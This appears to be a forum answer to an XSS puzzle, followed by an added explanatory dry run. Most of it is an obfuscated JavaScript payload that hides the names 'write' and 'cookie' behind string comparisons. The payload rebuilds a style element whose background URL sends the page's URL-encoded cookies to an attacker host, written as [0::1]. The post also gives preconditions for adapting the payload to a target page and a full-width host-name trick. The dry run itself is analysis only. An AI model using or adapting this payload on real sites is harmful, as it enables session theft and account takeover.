Answer
http://d.hatena.ne.jp/hoshikuzu/20090616#p3
I made a small mistake. It's long, so I'm posting it here.
<script>
</script><style>
body{background:url(http://[0::1]/style)}</style><script>
for (writd_ in {writd:0}){}
for (writf_ in {writf:0}){}
for (cookid_ in {cookid:0}){}
for (cookif_ in {cookif:0}){}
for (toString_ in {toString:0}){}
for (charAt_ in {charAt:0}){}
for (length_ in {length:0}){}
for (body_ in {documentElement:0}){}
for (innerHTML_ in {innerHTML:0}){}
for (split_ in {split:0}){}
for (style_ in {style:0}){}
for (var a in document)
  if (a >writd_)
    if (writf_ > a)
      if (6 >a[length_]) {
        document[a](document[body_][innerHTML_][split_](style_)[0][charAt_](0))
        document[a](style_)
        document[a](document[body_][innerHTML_][split_](style_)[1])
        for (var b in document)
          if (b >cookid_)
            if (cookif_ >b)
              document[a](encodeURI(document[b]))
        document[a](document[body_][innerHTML_][split_](style_)[2])
        document[a](style_)
        document[a](document[body_][innerHTML_][split_](style_)[3][charAt_](0))
      }
</script>
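Preconditions
- The innerHTML of the head element starts with "<" (if it does not, adjust the argument to charAt)
- No other style element exists (if one does, adjust the index into the array returned by split)
Both the attacker and the target are IPv6-capable. In browsers that implement NAMEPREP, writing the host name in full-width characters is OK.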
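For anyone analysing the snippet, here is a dry run of its string logic as an added example (not part of the original post). It touches no DOM, cookie or network, and shows which property names the range checks select and why the second precondition matters. The property list, the two page strings and the `SID=constructed` value are constructed assumptions.

```javascript
// Dry run of the payload's string logic on constructed data.
// No DOM, cookie or network access is involved.

// Constructed subset of the names `for (var a in document)` enumerates.
const DOCUMENT_PROPS = ["cookie", "createElement", "writeln", "write", "body", "title"];

// Mirrors `if (a > lo) if (hi > a) if (maxLen > a.length)`: plain string
// comparison selects a property name without ever spelling it out.
function selectByRange(names, lo, hi, maxLen = Infinity) {
  return names.filter((n) => n > lo && hi > n && n.length < maxLen);
}

// Mirrors the document[a](...) sequence: the markup is rebuilt from pieces of
// the page's own HTML split on the word "style". cookieText stands in for
// document.cookie (hypothetical placeholder value).
function rebuiltMarkup(html, cookieText) {
  const p = html.split("style");
  if (p.length < 4) return null; // fewer pieces than the payload indexes
  return p[0].charAt(0) + "style" + p[1] + encodeURI(cookieText)
       + p[2] + "style" + p[3].charAt(0);
}

// Constructed documentElement.innerHTML that meets both preconditions.
const PAGE_OK = "<head><title>t</title></head><body><script> </script>" +
  "<style> body{background:url(http://[0::1]/style)}</style><script></script></body>";

// Same page with an earlier style element: every split index shifts.
const PAGE_EXTRA_STYLE = PAGE_OK.replace("<head>", "<head><style>p{}</style>");

console.log(selectByRange(DOCUMENT_PROPS, "writd", "writf", 6)); // length check drops writeln
console.log(selectByRange(DOCUMENT_PROPS, "cookid", "cookif"));
console.log(rebuiltMarkup(PAGE_OK, "SID=constructed"));
console.log(rebuiltMarkup(PAGE_EXTRA_STYLE, "SID=constructed"));
```

With the extra style element the rebuilt string no longer contains the `url(...)` part at all, which is the index adjustment the preconditions call for.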